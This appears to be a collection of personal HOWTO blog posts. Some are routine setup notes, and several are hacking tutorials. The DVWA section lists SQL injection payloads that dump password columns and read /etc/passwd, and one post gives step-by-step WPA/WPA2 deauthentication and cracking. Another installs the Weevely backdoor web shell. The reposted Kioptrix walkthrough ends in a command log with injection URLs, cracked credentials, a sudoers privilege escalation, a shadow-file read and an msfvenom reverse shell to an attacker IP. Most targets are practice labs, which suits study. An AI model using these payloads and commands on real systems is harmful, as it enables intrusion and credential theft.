HOWTO Troubleshooting CUDA on Pentoo 2013.0 RC1.1

As Pentoo 2013.0 RC1.1 uses a hardened kernel, some applications may not work properly. You may need to inspect and change the PaX settings of the application in order to make it work.



Use paxctl to inspect and change the pax settings.



paxctl -h

paxctl -v [application name]




In the current Pentoo 2013.0 RC1.1 (as updated on April 29, 2013), CUDA does not work properly by default; some manual steps are required. This bug may be fixed in the next update or RC version.



First of all, make sure the CUDA libraries are loaded properly by checking that the following lines are present in the file /etc/env.d/99cuda :



cat /etc/env.d/99cuda



PATH=/opt/cuda/bin:/opt/cuda/libnvvp

ROOTPATH=/opt/cuda/bin

LD_LIBRARY_PATH=/opt/cuda/lib64:/opt/cuda/lib




Finally, make sure the affected applications have the proper PaX settings. For example, cudaHashcat-plus64.bin and Cryptohaze-Multiforcer run with CUDA, but their PaX flags are not set properly in the current version.



Make sure the PaX flags are set as shown below :







Known Issue



As of the current version/update on April 29, 2013, pyrit does not work properly with CUDA. Since pyrit is written in Python, paxctl does not help at all. According to one of the developers, pyrit will be removed from the distribution.



That's all! See you.




HOWTO Scapy 2.2.0 on Ubuntu 12.04 LTS

To install Scapy



sudo apt-get update
sudo apt-get install python-scapy python-pyx python-gnuplot




To run Scapy interactively



sudo scapy



The Scapy shell will be displayed :


WARNING: No route found for IPv6 destination :: (no default route?)

Welcome to Scapy (2.2.0)

>>>




To quit Scapy



>>> quit()


That's all! See you.

HOWTO DVWA SQL Injection

Security level = low



99 or 1=1

- will display all the records



99 or 1=1 union select 1,2,3

- will display "The used SELECT statements have a different number of columns" error message



99 or 1=1 union select 1,2

- no error message, but displays all records



99 or 1=1 union select null,null

- no error message, but displays all records



99 or 1=1 union select version(),database()

- will display the version of MySQL and the database name - dvwa



99 or 1=1 union select null, user()

or

99 or 1=1 union select user(), null

- will display the current user of the database



99 or 1=1 union select null, table_name from information_schema.tables

- will display all the table names



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'

- will display the users table column list



99 or 1=1 union select null, concat(first_name,0x0a,password) from users

- will display the first_name and password columns of the users table



99 or 1=1 union select null,@@datadir

- will display the mysql directory



99 or 1=1 union all select null,load_file('/etc/passwd')

- will display the content of /etc/passwd



Security level = medium



99 or 1=1

- will display all the records



99 or 1=1 union select 1,2,3

- will display "The used SELECT statements have a different number of columns" error message



99 or 1=1 union select 1,2

- no error message, but displays all records



99 or 1=1 union select null,null

- no error message, but displays all records



99 or 1=1 union select version(),database()

- will display the version of MySQL and the database name - dvwa



99 or 1=1 union select null, user()

or

99 or 1=1 union select user(), null

- will display the current user of the database



99 or 1=1 union select null, table_name from information_schema.tables

- will display all the table names



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns

- since a WHERE clause with a quoted string cannot be used at this level, all column names are listed



or



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273

- where 0x7573657273 is the hex value of "users"



99 or 1=1 union select null, concat(first_name,0x0a,password) from users

- will display the first_name and password columns of the users table



99 or 1=1 union select null,@@datadir

- will display the mysql directory
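The low and medium payloads above work for the same reason: the id parameter is pasted into the SQL text unquoted, so the medium level's quote escaping never touches a payload that contains no quotes. The following is an added illustration, not DVWA's own code: it models the three query builders (raw concatenation, quote escaping, and a validated bound parameter) against a constructed SQLite users table with invented rows, and SQLite's UNION column-count error stands in for MySQL's "The used SELECT statements have a different number of columns".

```python
import sqlite3

# Constructed stand-in for DVWA's users table (names and hash placeholders invented).
SAMPLE_USERS = [
    (1, "admin", "hash-placeholder-1"),
    (2, "gordonb", "hash-placeholder-2"),
]


def open_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def escape_quotes(value):
    """Model of the medium level's quote escaping (mysql_real_escape_string style).

    It backslash-escapes quote characters and nothing else: a payload such as
    '99 or 1=1 union select null,null' contains no quotes and passes through
    unchanged, which is also why the hex-encoded 0x7573657273 trick works.
    """
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def run_low(conn, user_input):
    """LOW: the raw parameter is concatenated, unquoted, into the SQL text."""
    sql = f"SELECT first_name, password FROM users WHERE user_id = {user_input}"
    return conn.execute(sql).fetchall()


def run_medium(conn, user_input):
    """MEDIUM: quotes are escaped, but the parameter is still unquoted SQL."""
    sql = f"SELECT first_name, password FROM users WHERE user_id = {escape_quotes(user_input)}"
    return conn.execute(sql).fetchall()


def run_safe(conn, user_input):
    """Hardened: validate the type, then bind the value as a query parameter.

    int() rejects anything that is not a plain id, and the bound parameter is
    data, never SQL, so no OR or UNION can be appended to the statement.
    """
    try:
        user_id = int(user_input)
    except ValueError:
        return []  # a real application would also log this as a probe
    sql = "SELECT first_name, password FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(conn, runner, payload):
    """Run one payload and return either the rows or the database error text,
    mirroring the page's "error message" versus "all records" observations."""
    try:
        return runner(conn, payload)
    except sqlite3.Error as exc:
        return f"error: {exc}"


if __name__ == "__main__":
    db = open_db()
    payloads = ["99 or 1=1", "99 or 1=1 union select 1,2,3", "99 or 1=1 union select null,null"]
    for name, runner in (("low", run_low), ("medium", run_medium), ("safe", run_safe)):
        for payload in payloads:
            print(f"{name:6} {payload!r:40} -> {probe(db, runner, payload)}")
```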



sqlmap for Security = low



./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns



For Security = medium is similar.



That's all! See you!




HOWTO FreeNAS 8.0.3 RELEASE p1 USB device boot bug fix

The Problem



When I upgraded my FreeNAS to the latest version, FreeNAS 8.0.3 RELEASE p1, it refused to boot and stopped at the following message.



mountroot> GEOM: da0s1: geometry does not match label (16h,63s != 255h,63s).

GEOM: da0s2: geometry does not match label (16h,63s != 255h,63s).




I typed the following command and it booted fine.



ufs:/dev/da0s1a



The problem is that I need to type the above command on every boot. How to solve this problem? Yes, I can.



The Solution



After the system boots up, a menu is displayed. Select "9) Shell" to go to the shell prompt, where we can do the following.



Step 1 :



nano /etc/fstab



Change from :

/dev/ufs/FreeNASs1a / ufs ro 1 1



To :

/dev/ufs/FreeNASs1a / ufs rw 1 1



Step 2 :



Then, save and exit the editor. Execute the following command :



mount -a



Step 3 :



Next, open up another file :



nano /boot/loader.conf



Change from :

#Fix booting from USB device bug

kern.cam.boot_delay=10000




To :

#Fix booting from USB device bug

kern.cam.boot_delay=20000




Save and exit the editor, then reboot. This time the boot is much slower than before, but it works. Problem solved!



That's all! See you.

HOWTO LimeChat with Tor on Mac OS X 10.8.4

Step 1 :



Download and install LimeChat from the Apple App Store on your Mac.



Step 2 :



LimeChat >> Preferences >> Interface >> Layout of the main window >> 3 Columns

LimeChat >> Server >> Server Properties >> General >> Network name -- TorifiedFreenode

LimeChat >> Server >> Server Properties >> General >> Server -- 10.40.40.40

LimeChat >> Server >> Server Properties >> General >> Port -- 6667

LimeChat >> Server >> Server Properties >> General >> Nickserv Password -- [your SASL password]

LimeChat >> Server >> Server Properties >> General >> Use SASL >> selected



LimeChat >> Server >> Server Properties >> Details >> Proxy >> SOCKS 5 proxy

LimeChat >> Server >> Server Properties >> Details >> Hostname >> 127.0.0.1

LimeChat >> Server >> Server Properties >> Details >> Port >> 9150



LimeChat >> Server >> Server Properties >> On Login >> #infosec-ninjas [add some channels]



Step 3 :



Go to Tor official website to download and install "Tor Browser Bundle for 64-Bit Mac".



Step 4 :



Run "TorBrowser_en-US".



Vidalia Control Panel >> Settings >> Advanced >> Edit current torrc



Append the following :



MapAddress 10.40.40.40 p4fsi4ockecnea7l.onion



Select it and then "Apply selection only" >> OK



Step 5 :



Close LimeChat, stop Tor and close the Vidalia Control Panel as well.



Then restart Vidalia Control Panel and LimeChat. TorBrowser will start up too.



That's all! See you.





HOWTO Setting up a Penetration Testing environment with VirtualBox

*** CAUTION : This tutorial is written for Penetration Testing only. Otherwise, you may be arrested if you attack/intrude on any other network/computer without authorization. ***



Software :

Back|Track 4 R1

Ubuntu 10.10 Desktop

VirtualBox 3.2.10 r66523



Hardware :

Lenovo ThinkPad X200 with 4GB RAM and 80GB SSD



The Lenovo ThinkPad X200 runs Ubuntu 10.10 Desktop edition, on which VirtualBox is installed.



Go to the Oracle VM VirtualBox site to download the VirtualBox :

http://dlc.sun.com/virtualbox/vboxdownload.html#linux



(A) Create Back|Track virtual machine :



Allocate at least an 8GB virtual hard drive and 512MB of RAM for Back|Track. The first network adapter is set to "NAT" and the second to "Host-Only".



Boot up Back|Track from the VirtualBox and click on "install.sh" to install Back|Track.



Log in for further configuration. The username is "root" and the password is "toor".



Step 1 :



After the installation, you may execute the following command to fix the screen size to 800x600.



fix-splash800



Then, change the root password when necessary. Otherwise, the username remains "root" and the password "toor".



Execute the following command to make Back|Track start the network interface and X.org on every boot.



kate /root/.bash_profile



Append the following lines :



start-network

startx




Step 2 :



To install the VirtualBox Guest Additions when necessary, open them via "Konqueror" -- "Storage Media" -- "media:/hdc" and run :



bash VBoxLinuxAdditions-x86.run



Step 3 :



apt-get -y update

apt-get -y upgrade




Step 4 :



Go to "Menu" -- "BackTrack" -- "Penetration" -- "Fast Track". Select "Fast-Track Interactive" and choose "1".



Step 4a :



Go to "Menu" -- "BackTrack" -- "Penetration" -- "ExploitDB". Select "Update Exploitdb".



Step 4b :



Go to "Menu" -- "BackTrack" -- "Penetration" -- "Social Engineering Toolkit". Select "S.E.T-Update".



Step 5 :



At the terminal, execute the following command :



airodump-ng-oui-update



Step 6 :



Go to "Menu" -- "BackTrack" -- "Vulnerability Identification" -- "OpenVAS" -- "OpenVAS NVT Sync".



Step 7 :



Update the Add-ons of Firefox.



Step 8 :



apt-get -y install crark

apt-get -y install wbox

apt-get -y install vlc




Step 9 :



Update the Metasploit Framework. Note that this may take several hours.



cd /pentest/exploits/framework3/

svn up




Step 10 :



Reboot the system.



(B) Create Metasploitable virtual machine (Optional)



Go to the following link to download "Metasploitable", which is an Ubuntu 8.04 server with some deliberate flaws.



http://blog.metasploit.com/2010/05/introducing-metasploitable.html



Set the downloaded Metasploitable image as the virtual hard drive in VirtualBox. The network adapter is set to "Host-Only". Allocate at least 8GB of virtual disk space and 512MB of RAM for Metasploitable.



(C) The final



Now, the IP address of eth0 on Metasploitable will be something like 192.168.56.101. The IP addresses of eth0 and eth1 on Back|Track will be something like 10.0.2.15 and 192.168.56.102 respectively.



You may need to execute the following command on Back|Track in order to see the two network interfaces and their IPs.



/etc/init.d/networking restart



Back|Track can access (or ping) Metasploitable via IP address. Back|Track can surf the internet but Metasploitable cannot.



At last, your penetration environment is set up.



(D) Free Tutorials



(1) Metasploit Unleashed

(2) Fast-Track

(3) Social-Engineer Toolkit

(4) Got Milk?

(5) How to Metasploit Beginner to Advanced (Video)



(E) Non-free Training



Offensive Security



(F) Resources



(1) Exploits Database

(2) Metasploit Blog

(3) Offensive security Blog

(4) Yet another Back|Track in Gnome

(5) Metasploit



That's all! See you.

HOWTO App Inventor for Android on Ubuntu 10.04

App Inventor for Android is another example of cloud computing. You can build your Android apps from a Java-enabled browser and sync them to your Android device with ease. In addition, anyone can build Android apps with App Inventor for Android without deep knowledge of Java and/or programming.



Go to the Register Form to register your account for App Inventor for Android. You may need to wait several weeks to receive the access permission email from Google.



On your Android device



Download and install "AppInventor Toggle" from the Market of your Android device.



Run "AppInventor Toggle", press "Menu", enable "Cable Detection" and disable "AppInventor Orientation".



Exit "AppInventor Toggle", press "Menu", "Settings", "Applications" and "Development", then enable "USB Debugging".



On your Ubuntu 10.04 desktop



Ubuntu 10.04 comes with OpenJDK (the open-source version of Java) and it is ready to go. You can install OpenJDK from the Ubuntu Software Centre if it is not installed. Or you can use Sun Java instead, but you are required to enable the repository at "System", "Administration", "Synaptic Package Manager".



Keep in mind that the App Inventor for Android official site recommends Sun Java instead of OpenJDK. If you encounter abnormal behavior in the web application, install Sun Java instead.



Go to Extra Software page and download the Debian package. The current version at this writing is 1.02.



sudo dpkg -i appinventor-extras_1.02_all.deb



You may encounter "Unable to get SyncService for device" when connecting to your Android smartphone from the Blocks Editor of the App Inventor web application. The following is the procedure to solve this problem (note that udev only reads rule files whose names end in ".rules").



sudo nano /etc/udev/rules.d/51-android.rules



Append the following line.

SUBSYSTEMS=="usb", ATTRS{idVendor}=="0bb4", ATTRS{idProduct}=="0ff9", MODE="0666"



Create a shell script.

nano android-syncservice



Append the following lines.

#!/bin/sh

# Solve the problem of "Unable to get SyncService for device" while connecting to Nexus One under Blocks Editor of App Inventor

# Restart the adb server shipped with appinventor-extras so it picks up the device; abort if the directory is missing

cd /usr/google/appinventor-extras/commands-for-Appinventor/ || exit 1

./adb kill-server

./adb devices

cd ~

exit 0




Copy the shell script to /etc/init.d and make it run automatically on every boot.

sudo cp android-syncservice /etc/init.d/

sudo chmod +x /etc/init.d/android-syncservice




sudo update-rc.d android-syncservice defaults



Or, you may need to reboot your system.



Now connect your Android device to your Ubuntu 10.04 desktop with the USB cable. You are ready to go.



Follow the instructions at Connect App Inventor to Your Phone.



Then, study the Tutorials.



Finally, Live Development, Testing and Debugging.



Known Issue



The size of the apk (application package) is quite large: at least about 3 to 4 MB for a very simple application, such as the tutorial apps.



That's all! See you.

HOWTO WPA/WPA2 cracking with Back|Track 5

Don't crack any wifi router without authorization; otherwise, you will be put in jail.



(A) General Display card



Step 1 :



airmon-ng



The result will be something like :



Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]






Step 2 :



airmon-ng start wlan0



Step 3 (Optional) :



Change the MAC address of the mon0 interface.



ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up




Step 4 :



airodump-ng mon0



Then, press "Ctrl+c" to stop the program.



Step 5 :



airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0



* where -c is the channel, -w is the prefix of the file to be written, and --bssid is the BSSID



Keep this terminal running.



Step 6 :



Open another terminal.



aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0



* where -a is the BSSID and -c is the client MAC address (STATION)



Wait for the handshake.



Step 7 :



Use the John the Ripper word list to crack the WPA/WPA2 password.



aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs



Step 8 (Optional) :



If you do not want to use the John the Ripper word list, you can use Crunch.



Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/



Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download



tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install




/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



(B) nVidia Display Card with CUDA



If you have an nVidia card with CUDA, you can use pyrit to crack the password with crunch.



Step a :



airmon-ng



The result will be something like :



Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]






Step b :



airmon-ng start wlan0



Step c (Optional) :



Change the MAC address of the mon0 interface.



ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up




Step d :



airodump-ng mon0



Then, press "Ctrl+c" to stop the program.



Step e :



airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0



Step f :



Open another terminal.



aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0



* where -a is the BSSID and -c is the client MAC address (STATION)



Wait for the handshake.



Step g :



If the following packages are not yet installed, install them.



apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy



Step h :



Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/



Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download



tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install




Step i :



Go to the official site of pyrit.



http://code.google.com/p/pyrit/downloads/list



Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).



tar -xzvf pyrit-0.4.0.tar.gz

cd pyrit-0.4.0

python setup.py build

sudo python setup.py install




tar -xzvf cpyrit-cuda-0.4.0.tar.gz

cd cpyrit-cuda-0.4.0

python setup.py build

sudo python setup.py install




Step j :



/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



Step k (Optional) :



If you encounter an error when reading wpacrack-01.cap, do the following step.



pyrit -r wpacrack-01.cap -o new.cap stripLive



/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



Step l :



Then, you will see something similar to the following.



Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+



Parsing file new.cap (1/1)...

Parsed 71 packets (71 802.11-packets), got 55 AP(s)



Tried 17960898 PMKs so far; 17504 PMKs per second.




Remarks :



If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
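The pyrit output above is measured in PMKs per second because WPA/WPA2-PSK derives the PMK with PBKDF2-HMAC-SHA1 (4096 iterations, SSID as salt), so every candidate from crunch costs 4096 HMAC computations, and the block below carries that derivation and the keyspace arithmetic for the "crunch 8 16" range through at the page's rate. It is an added illustration, not pyrit's or crunch's code; the 95-character charset size (standing in for mixalpha-numeric-all-space-sv, whose exact size is not on the page) and the 3,500-entry word list are assumptions, and the 17,504 PMK/s rate is the one shown in the pyrit output above.

```python
import hashlib

PBKDF2_ITERATIONS = 4096  # fixed by IEEE 802.11i for WPA/WPA2-PSK
PMK_BYTES = 32            # 256-bit PMK
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).

    This is the per-candidate work that pyrit's "PMKs per second" counts.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, PMK_BYTES)


def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Number of candidates 'crunch min_len max_len' emits over a charset."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def seconds_to_exhaust(candidates: int, pmk_per_second: float) -> float:
    """Worst-case time to try every candidate at a fixed PMK rate."""
    return candidates / pmk_per_second


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
    print("PMK:", derive_pmk("password", "IEEE").hex())

    rate = 17504  # PMKs per second, from the pyrit output on this page
    # Assumption: a 95-character printable-ASCII set stands in for crunch's
    # mixalpha-numeric-all-space-sv entry, whose exact size is not on the page.
    full = keyspace(95, 8, 16)
    print(f"crunch 8 16 over 95 chars: {full:.3e} candidates, "
          f"{seconds_to_exhaust(full, rate) / SECONDS_PER_YEAR:.3e} years")

    # Constructed contrast: a word list of a few thousand entries, the size
    # class of the john password.lst used above, is exhausted almost instantly.
    small = 3500
    print(f"{small}-word list: {seconds_to_exhaust(small, rate):.2f} s")
```

The defender's lesson is that the key derivation only slows the attacker by a constant factor; a random passphrase drawn from the large end of this range is out of reach at these rates, while a dictionary word is not.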



To test whether your wireless card (either USB or PCI-e) can do injection or not :



airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0



Make sure pyrit works on your system :



pyrit list_cores



That's all! See you.

HOWTO Weevely on Ubuntu Desktop 12.04 LTS

Weevely is a stealth PHP web shell that simulates an SSH-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.



Step 1 :



sudo apt-get install git



sudo -sH

cd /opt

git clone git://github.com/epinna/Weevely.git




Step 2 :



To run it :



sudo -sH

cd /opt/Weevely

./weevely.py




That's all! See you.



HOWTO Cryptohaze Multiforcer on two nVidia GeForce GTX 590 and Intel i7-3930K

The Cryptohaze Multiforcer is a high performance CUDA password cracker that is designed to target large lists of hashes. Performance holds very solid with large lists, such that on a suitable server, cracking a list of 1 000 000 passwords is not significantly slower than cracking a list of 10. For anyone who deals with large lists of passwords, this is a very useful tool! Algorithm support includes MD5, NTLM, LM, SHA1, and many others. The official website of Cryptohaze Multiforcer is here.



Download Cryptohaze-Linux_x64_1_30.tar.bz2



tar -xjvf Cryptohaze-Linux_x64_1_30.tar.bz2



cd Cryptohaze-Linux



nano single_charset



Append the following :



ABCEDFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_+|}{":?><`-=][;/.,



Cracking the sample SHA1 hashes on my two nVidia GeForce GTX 590 system :



./Cryptohaze-Multiforcer -h SHA1 -f test_hashes/Hashes-SHA1-Full.txt -c single_charset --threads 512 --blocks 512 -m 500



Hardware Configuration :



CPU : Intel i7-3930K (12 cores with Hyper-Threading, Socket 2011)

Motherboard : ASUS SaberTooth X79

RAM : Corsair Vengeance DDR3 1600 32GB (4GB x 8)

Display Card : Inno3D nVidia GeForce GTX 590 384bit 3072MB DDR5 x 2

Hard Drive : Seagate SATA II 1TB x 2

Power Supply : Seasonic X-series 1250W

CPU Heat Sink : Corsair H100 Liquid CPU Cooler

Case : Corsair Graphite Series 600T Black



Remarks :



Installation of CUDA on Back|Track 5 R1



That's all! See you.




HOWTO Kioptrix Level 1.2

*** Do NOT attack any computer or network without authorization, or you may be put in jail. ***



Credit to : g0tmi1k



This is g0tmi1k's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.



The original post is here.



Links



Watch video on-line

Download video



Brief Overview



It's time for round 3 with Kioptrix's "Vulnerable-By-Design" series. Normal goal of "boot-to-root", by any means possible.



The target was fully compromised with a mixture of SQL injection, re-used credentials and a poorly configured setting. After gaining root access, to extend the video, two methods of backdooring the system were installed, as well as an alternative idea to escape privileges.



Method



Scanned network for the host (nmap)

Added IP address to the host file

Port scanned the host (unicornscan)

Banner grabbed the services running on the open ports (nmap)

Discovered usernames via a Local File Inclusion vulnerability (Firefox)

Enumerated database (manual MySQL injection)

Reused credentials granting a remote shell

Poorly configured setting to escape privileges (Unprotected limited root access)

Uploaded and used a web backdoor (Meterpreter)

Automated MySQL Injection (SQLMap)

Alternative method to gain root as well as escaping privileges (Cron Job)



What do I need?



Kioptrix VM Level 1.2 [KVM3.rar] (MD5: D324FFADD8E3EFC1F96447EEC51901F2)

A virtual machine (Example: Virtual Box or VMware Player)

Nmap – (Can be found on BackTrack 5).

Unicornscan – (Can be found in BackTrack 5s repository).

Exploit-DB – (Can be found on BackTrack 5).

John The Ripper – (Can be found on BackTrack 5).

SQLMap – (Can be found on BackTrack 5).

Metasploit – (Can be found on BackTrack 5).



Walkthrough



The attacker starts off with locating the target system on the network, which is done by using a quick "ping" scan via nmap.



Once the target has been discovered, the attacker adds the IP address to their host file. (The reasoning for this is that Kioptrix uses DHCP to assign its IP address and, later on, the HTML code needs a "static reference" to use as a source.)



Afterwards the attacker executes a TCP & UDP port scan using unicornscan. The results show only two ports are open, TCP 22 and TCP 80. The attacker repeats the port scan, this time switching to nmap and enabling the option to "banner grab" the services which are running on the open ports, to enumerate running services. Nmap confirms that the same ports are open and that the default services are using them: SSH (TCP 22) and Web (TCP 80).



The attacker continues by interacting with the web server. Upon visiting the web server, the attacker is presented with a blog. When exploring the web site, the attacker notices a common URI which often has a "Local/Remote File Include" vulnerability. The attacker uses this to their advantage by including a known file which commonly contains details of each user on the system. This shows that the system has two possible users, "loneferret" and "dreg".



One of the blog posts referred to a product running on their web server, a new gallery. The end of the post contains the URL of the gallery. Another post helped confirm one of the usernames, "loneferret", as it was mentioned again.



After looking at the source code for the gallery, the attacker notices that the admin link in the template has been commented out, rather than being removed from the code completely. After visiting the page, the gallery service has been identified as "gallarific".



When checking to see if "Gallarific" has any known public exploits, they find it is subject to a SQL injection attack. The exploit gives the weak URL and the attacker manually starts enumerating the database. They start off by seeing which tables are accessible, then the names of the columns inside the "dev_account" table. This shows there are three fields, "id", "username" and "password". The attacker views the values and, upon doing so, sees the same two usernames as before along with their respective MD5 hashes.



The attacker inserts the hashes into John the Ripper, which quickly brute forces them (as they are not salted!), showing that loneferret's password is "starwars" and dreg's is "Mast3r".



A common issue is password re-use, which the attacker is aware of, therefore they attempt to see if any of the users did so with their SQL and SSH credentials. Loneferret did.



After viewing loneferret's personal folder, there is a company readme file which explains their policy: that they must use a certain program, "ht", to create, view and edit files. However, in the example command, it says the employee needs to use "sudo" to do so. Sudo allows programs to be used with the security privileges of another user, which in this case is the super user account, root. This allows the attacker to create, view and edit any file.



With this, the attacker uses ht to "upgrade" their currently limited usage of the sudo to give them root access. After granting the upgrade of privileges, the attacker logs in as root. The attacker now has access to the complete system...



Game over



Because the attacker doesn't wish to keep exploiting the same box again, they want to place a backdoor, which allows quicker access back into the system. The attacker searches for the admin credentials to the gallery product, as there is a high chance that there is an upload feature which they could try to take advantage of.



By using the same SQL injection as before, the attacker manually starts searching another table, "gallarific_users". The attacker soon finds the admin username & password, in plain text.



(Editor's note: This stage isn't "needed"; it was only done to show how automated tools simplify the whole process!)



The attacker then starts to enumerate the whole database, by using SQLMap. The tool quickly finds extra useful information regarding the database, as well as automatically attempting to crack any known password hash formats. This confirms everything which was found manually.



After logging in as the admin for the gallery, the attacker is able to confirm their suspicions from earlier: the product supports uploading. The attacker generates a PHP reverse shell in an image format and then uploads their evil image. Due to the product automatically checking file extensions, renaming uploaded images, and the server configuration, the attacker isn't able to execute the "image". However, due to the "local file include" which was found at the beginning, the attacker is able to execute the code inside the image, which creates a shell. The type of shell which the attacker is using to interact with the system isn't able to switch users. But by using Python, which has already been installed locally on the system, the attacker is able to code a quick script to get around this limitation, using Python to spawn a bash terminal in the background and relay commands into it.



Instead of modifying the sudoers file as originally done to gain root access to the system, the attacker writes a cron job to start on the next minute and, as the root account, download a file and execute it, as well as deleting the job (optional!). The attacker then creates the backdoor executable file and starts a web server to host the file for the target to download. The attacker then waits for the target's clock to reach the next minute and execute the command, spawning a remote root shell.



Game over...again



Commands



nmap 192.168.0.* -n -sn -sP

echo 192.168.0.10 kioptrix3.com >> /etc/hosts # It's in the readme

cat /etc/hosts

us -H -msf -Iv kioptrix3.com -p 1-65535 && us -H -mU -Iv kioptrix3.com -p 1-65535

nmap -p 1-65535 -T4 -A -v kioptrix3.com

firefox kioptrix3.com # Link-> Blog

http://kioptrix3.com/../etc/passwd.html

# Gallery --> Source code (gadmin): http://kioptrix3.com/gallery/gadmin/

cd /pentest/exploits/exploitdb

grep -i gallarific files.csv

cat platforms/php/webapps/15891.txt

firefox kioptrix3.com/gallery/gallery.php

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=dev_accounts),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password) from dev_accounts),4,5,6

echo -e "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d09794d8f021f40f0e" >> /tmp/hashes

cd /pentest/passwords/john

./john /tmp/hashes --format=raw-md5

ssh loneferret@kioptrix3.com # starwars

id

pwd

ls -lA

cat CompanyPolicy.README

ls -lh /etc/sudoers

cat /etc/sudoers

sudo ht # starwars File -> Open: /etc/sudoers -> Edit loneferret: loneferret ALL=(ALL) ALL -> File -> Save

sudo su # starwars

id && ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/

cd /etc/apache2/sites-enabled

ls

cat * | grep -i documentroot

exit

exit

firefox

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=gallarific_users),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype) from gallarific_users),4,5,6

cd /pentest/database/sqlmap

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" -f -b --current-user --is-dba --dbs

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --users --passwords

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --file-read="/etc/passwd"

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump

http://kioptrix3.com/gallery/gadmin # admin n0t7t1k4 Upload new pic

cd /pentest/backdoors/web/webshells

ls -lAh

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg # msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 R

